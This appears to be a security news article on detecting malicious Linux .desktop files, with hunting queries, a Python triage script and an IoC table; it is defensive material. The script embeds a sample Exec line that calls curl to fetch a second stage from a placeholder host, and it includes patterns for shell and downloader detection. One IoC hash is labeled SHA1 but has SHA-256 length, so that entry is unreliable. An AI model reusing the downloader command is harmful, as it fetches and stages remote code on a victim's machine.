Google Threat Intelligence Releases Actionable Threat Hunting Technique for Malicious .desktop Files
Google Threat Intelligence has unveiled a series of sophisticated threat hunting techniques to detect malicious .desktop files, a novel attack vector leveraged by threat actors to compromise systems.
Initially documented by Zscaler researchers in 2023, this technique abuses .desktop files (plain-text configuration files that define how applications are launched in Linux desktop environments) to execute malicious commands.
A recent surge of such files uploaded to Google Threat Intelligence prompted an in-depth analysis, resulting in actionable strategies for identifying and mitigating these threats.
This discovery underscores the evolving tactics of cybercriminals who obfuscate their intent with junk code and exploit legitimate system processes to deploy malware, often using Google Drive-hosted PDFs as distractions while subsequent malicious payloads are downloaded.
A Persistent Threat to Linux Systems
The structure of .desktop files, adhering to the Desktop Entry Specification, typically includes sections like [Desktop Entry] with keys such as Name, Comment, Exec, and Icon, making them portable across Linux distributions.

However, the malicious variants identified by Google Threat Intelligence deviate starkly from the norm.
These files often start with thousands of lines of ‘#’ characters interwoven with legitimate content to obscure their true purpose.
Upon execution, the ‘Exec’ variable triggers commands that may open seemingly innocuous PDFs via Google Drive using system utilities like xdg-open, which in turn delegates to environment-specific processes such as exo-open in XFCE, gio open in GNOME, or kde-open in KDE.
In Google’s sandbox analysis report, the process chain (xdg-open to exo-open to exo-helper-2) reveals how URLs are opened in default browsers like Firefox while covert malware stages are deployed.
This intricate abuse of standard Linux behavior highlights the need for robust detection mechanisms, which Google Threat Intelligence addresses through targeted queries and behavioral analysis.
Defenders with Precise Detection Queries
To empower defenders, Google Threat Intelligence provides several hunting queries focusing on process behaviors and file content.
One approach targets the final process in the execution chain, exo-helper-2, by searching for arguments like “--launch WebBrowser” alongside Google Drive URLs, which can indicate suspicious activity.
Broader queries encompass processes across desktop environments, combining terms like xdg-open, exo-open, and environment-specific commands to capture URL-opening behaviors tied to malicious .desktop files.
Additionally, queries leveraging commands executed by xdg-open, such as “/usr/bin/grep -i ^xfce_desktop_window” or “/usr/bin/xprop -root”, help identify related samples when paired with indicators like Google Drive URLs or PDF downloads.
For generic detection, searching for the “[Desktop Entry]” string at the file’s start or specific content patterns like “Exec=bash -c” offers a way to uncover potential threats, including those acting as downloaders or loaders for further malicious payloads like miner-related ELF files.
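As an added example (not Google Threat Intelligence’s own tooling), the following Python triage routine applies the file-content indicators described above to the text of a .desktop file: the junk ‘#’ padding ahead of the [Desktop Entry] header, an Exec key that spawns a shell with -c, xdg-open pointed at a Google Drive URL, and a downloader step. The two samples, the placeholder URLs and the 100-line padding threshold are constructed assumptions, not values from the report.

```python
"""Static triage of a .desktop file for the traits described above.
Added example, not Google Threat Intelligence's code; samples and the
100-line threshold are constructed assumptions."""
import re
from dataclasses import dataclass, field

JUNK_COMMENT_THRESHOLD = 100  # assumption: tune against your own corpus

# Constructed sample: junk '#' lines, then a launcher that opens a Google
# Drive URL and fetches a second stage. Placeholder URLs, not real IoCs.
SAMPLE_MALICIOUS = "\n".join(["#" * 40] * 150) + """
[Desktop Entry]
Name=Award Medal Declaration Form
Exec=bash -c "xdg-open https://drive.google.com/file/d/EXAMPLE_ID/view; curl -fsSL https://example.invalid/stage2 -o /tmp/s2"
Icon=application-pdf
"""
# Constructed benign launcher for comparison.
SAMPLE_BENIGN = "[Desktop Entry]\nName=Text Editor\nExec=gedit %U\n"

@dataclass
class DesktopTriage:
    junk_comment_lines: int = 0
    exec_cmd: str = ""
    findings: list = field(default_factory=list)

def triage_desktop(text: str) -> DesktopTriage:
    """Return the indicators present in the text of one .desktop file."""
    r = DesktopTriage()
    lines = text.splitlines()
    # The spec allows comment lines anywhere, which the padding abuses:
    # count '#' lines that precede the [Desktop Entry] group header.
    for line in lines:
        if line.strip() == "[Desktop Entry]":
            break
        if line.startswith("#"):
            r.junk_comment_lines += 1
    if r.junk_comment_lines >= JUNK_COMMENT_THRESHOLD:
        r.findings.append("excessive '#' padding before [Desktop Entry]")
    # Value of the Exec key; a later duplicate overrides an earlier one.
    for line in lines:
        if line.startswith("Exec="):
            r.exec_cmd = line[len("Exec="):].strip()
    if re.search(r"\b(?:ba)?sh\s+-c\b", r.exec_cmd):
        r.findings.append("Exec spawns a shell with -c")
    if "xdg-open" in r.exec_cmd and "drive.google.com" in r.exec_cmd:
        r.findings.append("Exec opens a Google Drive URL via xdg-open")
    if re.search(r"\b(?:curl|wget)\b", r.exec_cmd):
        r.findings.append("Exec fetches additional content (downloader)")
    return r
```

Run over a directory of launchers, a non-empty `findings` list on a file that also sits in an autostart or Downloads location is a reasonable trigger for the process-chain queries above.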
The following table lists recent samples uploaded in 2025, potentially linked to the Zscaler-reported campaign, though attribution remains unconfirmed.
Note that the upload country does not necessarily indicate the victim’s location due to possible proxy use.
Indicators of Compromise (IoCs)
| Filename | SHA1 | Upload Date | Upload Country |
|---|---|---|---|
| Opportunity for Exercise, Re Exercise of Option for pay Fixation.desktop | c2f0f011eabb4fae94e7a5973f1f05208e197db983a09e2f7096bcff69a794d1 | 2025-04-30 | India |
| Revised SOP for Webex Meeting – MOD.desktop | 8d61ce3651eb070c8cdb76a334a16e53ad865572 | 2025-04-15 | India |
| Posting, transfer under Ph-III of Rotational Transfers of ASO and SSAs.desktop | eb35be47387605ba194e5422c5f1e99e6968af65 | 2025-04-09 | India |
| Award Medal Declaration Form.desktop | 1814730cb451b930573c6a52f047301bff0b84d1 | 2025-04-08 | Australia |
| Help Manual for NIC & GOV Email ID Creation.pdf.desktop | 040711b2e577fcdba8dc130f72475935893e8471 | 2025-04-04 | India |